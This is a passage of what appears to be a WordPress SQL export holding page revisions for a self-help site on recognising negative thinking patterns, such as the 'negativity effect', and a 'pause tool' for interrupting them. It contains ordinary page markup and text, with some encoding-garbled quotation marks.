personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1783,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cloudsea_100323D.jpg" alt="" class="wp-image-1783"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1791,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/cauldron_110623.jpg" alt="" class="wp-image-1791"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-11 17:25:01', '2023-06-11 17:25:01', '', 1034, 'https://www.happythinking.com/?p=1804', 0, 'revision', '', 0),
(1972, 1, '2023-06-26 10:29:49', '2023-06-26 10:29:49', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1937,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623a.jpg" alt="" class="wp-image-1937"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-26 10:29:49', '2023-06-26 10:29:49', '', 88, 'https://www.happythinking.com/?p=1972', 0, 'revision', '', 0),
(1966, 1, '2023-06-26 06:51:28', '2023-06-26 06:51:28', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1937,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623a.jpg" alt="" class="wp-image-1937"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below the very short survey to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-26 06:51:28', '2023-06-26 06:51:28', '', 88, 'https://www.happythinking.com/?p=1966', 0, 'revision', '', 0),
(1946, 1, '2023-06-21 17:21:34', '2023-06-21 17:21:34', '<!-- wp:paragraph -->\n<p>In our minds, various thoughts appear and quickly spread into different areas. These thoughts may create positive thinking patterns or negative thinking patterns and happy thinking is about applying tools to deal with the latter. However, it would be very difficult to meaningfully interact with such â€œspeedingâ€ thoughts. To engage with a thought, one needs to first pause it so that it can â€œhearâ€ you. It''s a bit like when a child is crazily running around in a room, to speak to the child meaningfully, one will first need the child to cease running and become still. In the case of the child, you may shout her name loudly, â€œShelly!â€,&nbsp; and this would, at least briefly, make her pause her running around. Once you get her attention, you may be able to engage with her, â€œShelly, itâ€™s time for dinner!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can one get the attention of a thought that is speeding along? The answer is to use oneâ€™s inner voice. As soon as one senses a negative thinking pattern occurring in oneâ€™s mind, one can use oneâ€™s internal voice to say as strongly as possible, â€œPause!â€ What this does is to temporarily â€œfreezeâ€ the thought, so that oneâ€™s mind can engage with it before it continues to cause more negative thoughts to be generated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me explain this concept using an example. Letâ€™s imagine that a person, who we will call Jay, is a very anxious person and he is at his home waiting for his partner to return from work. He looks at the clock and notices that it''s ten minutes past the time that his partner normally returns home from work. Imagine that at this point, Jayâ€™s mind generates the following negative thought, â€œShe must have met with a horrendous road traffic accident.â€ At this point, this thought is unnecessarily negative because there is no information to say that an accident has actually happened, and there are so many other less serious options such as being stuck in traffic. Jayâ€™s mind is simply â€œassumingâ€ that an accident has happened, when actually, at this point there is no information to support that thought. So at this point, Jayâ€™s incorrect assumption is making him unnecessarily worry. Jay is aware that he suffers from anxiety and he has some suspicions that his thoughts are probably negative. So his first step is to pause the thought, and he does this by using his internal voice and saying to his mind, â€œpauseâ€. This will briefly pause his negative thought, â€œShe must have met with a horrendous road traffic accident.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now if this was all that had to be done for negative thinking patterns, i.e. just saying â€œpauseâ€, wouldnâ€™t that be great? A few â€œpausesâ€ and everything would be fine! As you have probably guessed, there are a few more steps needed. That is, once a negative thinking pattern has been paused, one will need to use a few other simple tools to deal with the thought, and I will explain those tools in subsequent sections of this website.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of you may think, â€œWhy not use the word â€˜stopâ€™ instead of the word â€˜pauseâ€™, as the former is a much more commanding word?â€ The reason is, perhaps like humans, thoughts do not â€˜likeâ€™ to follow orders! Let me demonstrate this using a simple psychological experiment that we can do right now. Are you ready? Ok. I am going to give you a super easy task now. For this task, you do not even have to move a finger! Here is your task: â€œPlease DO NOT think of a white rabbit.â€ I am sure you will agree that it is quite an easy task, where all I have asked you to do is not think of a white rabbit. However, I am quite sure that most of you would have failed this simple task and would have thought, at least briefly and vaguely, of a white rabbit! This is a very common finding and highlights how telling your thoughts to go away (e.g. â€œby saying stopâ€) does not work, and even can have the opposite effect. That is why I named this tool the â€œpause toolâ€ rather than naming it the â€œstop toolâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pause tool may appear simplistic, but once you combine it with the other tools that I will explain to you later, you will realise that it is actually quite powerful. The aim of the pause tool is to simply hold a negative thought just long enough for other tools to engage with it. Donâ€™t underestimate the power of your inner voice!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Pause tool', '', 'inherit', 'closed', 'closed', '', '1650-revision-v1', '', '', '2023-06-21 17:21:34', '2023-06-21 17:21:34', '', 1650, 'https://www.happythinking.com/?p=1946', 0, 'revision', '', 0),
(1845, 1, '2023-06-16 06:42:41', '2023-06-16 06:42:41', '<!-- wp:paragraph -->\n<p>First of all, welcome you to this website where I will tell you about â€œHappy Thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We all desire to be happy. Unfortunately, the reality of the world we live in is that we all are constantly surrounded by problems. When facing problems, certain â€œnegative waysâ€ of thinking can unnecessarily increase our suffering, make us less efficient at problem-solving and bring about unhappiness in us. Sometimes such thinking can even create problems when none existed before.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Of course, in the opposite way, one can think in â€œpositiveâ€ ways, which help one better cope with problems and end up making oneself a happier person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was negative and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1842,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/drowning_160623.jpg" alt="" class="wp-image-1842"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise negative thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. To reflect this approach, I have divided this website about Happy Thinking into two main parts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy-to-understand way, common negative ways of thinking. This part will help you to recognise such thinking when it happens in your mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various mental techniques that your mind can use to either change negative ways of thinking or help prevent such thinking from affecting you in an adverse way. I like to think of such techniques as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with negative thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing negative thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way. Happy thinking is about combining these ingredients to make you into a happy person.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1844,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/happycauldron160623c.jpg" alt="" class="wp-image-1844"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-06-16 06:42:41', '2023-06-16 06:42:41', '', 1034, 'https://www.happythinking.com/?p=1845', 0, 'revision', '', 0),
(1848, 1, '2023-06-16 07:42:54', '2023-06-16 07:42:54', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns by discussing one that is very common. In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking can make the person feel that things are worse than they really are as the minimised positive events donâ€™t counteract the emotional impact of negative events.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Psychologists call this type of thinking, where one gives more importance to negative events when compared to positive events, the â€œnegativity effectâ€. The â€œnegativity effectâ€ type of negative thinking is very common and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a tiger''s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1847,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_160623.jpg" alt="" class="wp-image-1847"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a tiger''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst tigers and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>[image]</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here is a short example of the â€œnegativity effectâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The â€œnegativity effectâ€ type of negative thinking made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, it''s important to recognise when your thinking is distorted by the negativity effect. As I mentioned before, Happy Thinking is about dealing with such negative thinking patterns. Once we have gone over the common types of negative thinking patterns, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negativity effect', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-16 07:42:54', '2023-06-16 07:42:54', '', 1616, 'https://www.happythinking.com/?p=1848', 0, 'revision', '', 0),
(1851, 1, '2023-06-16 08:09:56', '2023-06-16 08:09:56', '<!-- wp:paragraph -->\n<p>Let us start our discussions about various negative thinking patterns by discussing one that is very common. In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may develop a negative thinking pattern where negative events are given much more attention than positive events. In the example I gave, the person may focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of thinking can make the person feel that things are worse than they really are as the minimised positive events donâ€™t counteract the emotional impact of negative events.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, it''s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Psychologists call this type of thinking, where one gives more importance to negative events when compared to positive events, the â€œnegativity effectâ€. The â€œnegativity effectâ€ type of negative thinking is very common and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that your ancestor was daydreaming and walking without a care in the world, and then accidentally stepped on a tiger''s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1847,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_160623.jpg" alt="" class="wp-image-1847"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If this ancestor survived the ensuing chase, it would be in his or her survival interest to not forget the negative event of stepping on a tiger''s tail. No more daydreaming while walking in the forest! While most of us donâ€™t walk amongst tigers and such, these tendencies, to focus on the negatives, may well be still persisting in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1850,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tiger_memory_160623.jpg" alt="" class="wp-image-1850"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Here is a more modern example of the â€œnegativity effectâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed 